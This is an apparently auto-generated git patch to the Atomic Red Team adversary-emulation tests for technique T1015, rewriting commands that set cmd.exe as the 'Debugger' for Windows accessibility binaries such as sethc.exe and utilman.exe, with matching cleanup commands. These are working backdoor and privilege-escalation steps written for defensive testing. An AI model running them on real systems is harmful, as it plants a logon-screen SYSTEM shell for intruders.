From 23285cf6cbd05f258ab508c83532dbc5fff232d5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 6 Jan 2020 21:07:55 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master --- atomics/T1015/T1015.md | 133 +++++++++++++++++-- atomics/index.yaml | 290 +++++++++++++++++++++++++++++++++-------- 2 files changed, 353 insertions(+), 70 deletions(-) diff --git a/atomics/T1015/T1015.md b/atomics/T1015/T1015.md index ddc960dd..0d61b1ca 100644 --- a/atomics/T1015/T1015.md +++ b/atomics/T1015/T1015.md @@ -48,12 +48,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | osk.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f +```

@@ -69,12 +84,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | sethc.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f +```

@@ -90,12 +120,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | utilman.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f +```

@@ -111,12 +156,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | magnify.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f +```

@@ -132,12 +192,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | narrator.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f +```

@@ -153,12 +228,27 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f +```

@@ -174,11 +264,26 @@ This allows adversaries to execute the attached process |------|-------------|------|---------------| | target_executable | File You Want To Attach cmd To | String | atbroker.exe| -#### Run it with `command_prompt`! Elevation Required (e.g. root or admin) +#### Run it with `powershell`! Elevation Required (e.g. root or admin) ``` -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f +$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" +$Value = "C:\windows\system32\cmd.exe" +$Name = "Debugger" +IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force | Out-Null + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } +ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } ``` +#### Cleanup Commands: +``` +reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f +```
diff --git a/atomics/index.yaml b/atomics/index.yaml index d45fda18..c9c29c2d 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -178,11 +178,23 @@ persistence: type: String default: osk.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - sethc @@ -197,11 +209,23 @@ persistence: type: String default: sethc.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - utilman @@ -216,11 +240,24 @@ persistence: type: String default: utilman.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - magnify @@ -235,11 +272,24 @@ persistence: type: String default: magnify.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - narrator @@ -254,11 +304,24 @@ persistence: type: String default: narrator.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - DisplaySwitch @@ -273,11 +336,24 @@ persistence: type: String default: DisplaySwitch.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - AtBroker @@ -292,11 +368,24 @@ persistence: type: String default: atbroker.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force | Out-Null + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger + /f ' T1098: @@ -12754,11 +12843,23 @@ privilege-escalation: type: String default: osk.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - sethc @@ -12773,11 +12874,23 @@ privilege-escalation: type: String default: sethc.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f ' - name: Attaches Command Prompt As Debugger To Process - utilman @@ -12792,11 +12905,24 @@ privilege-escalation: type: String default: utilman.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - magnify @@ -12811,11 +12937,24 @@ privilege-escalation: type: String default: magnify.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - narrator @@ -12830,11 +12969,24 @@ privilege-escalation: type: String default: narrator.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - DisplaySwitch @@ -12849,11 +13001,24 @@ privilege-escalation: type: String default: DisplaySwitch.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger + /f ' - name: Attaches Command Prompt As Debugger To Process - AtBroker @@ -12868,11 +13033,24 @@ privilege-escalation: type: String default: atbroker.exe executor: - name: command_prompt + name: powershell elevation_required: true - command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image - File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d - "C:\windows\system32\cmd.exe" /f + command: | + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" + $Value = "C:\windows\system32\cmd.exe" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force | Out-Null + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows + NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger + /f ' '':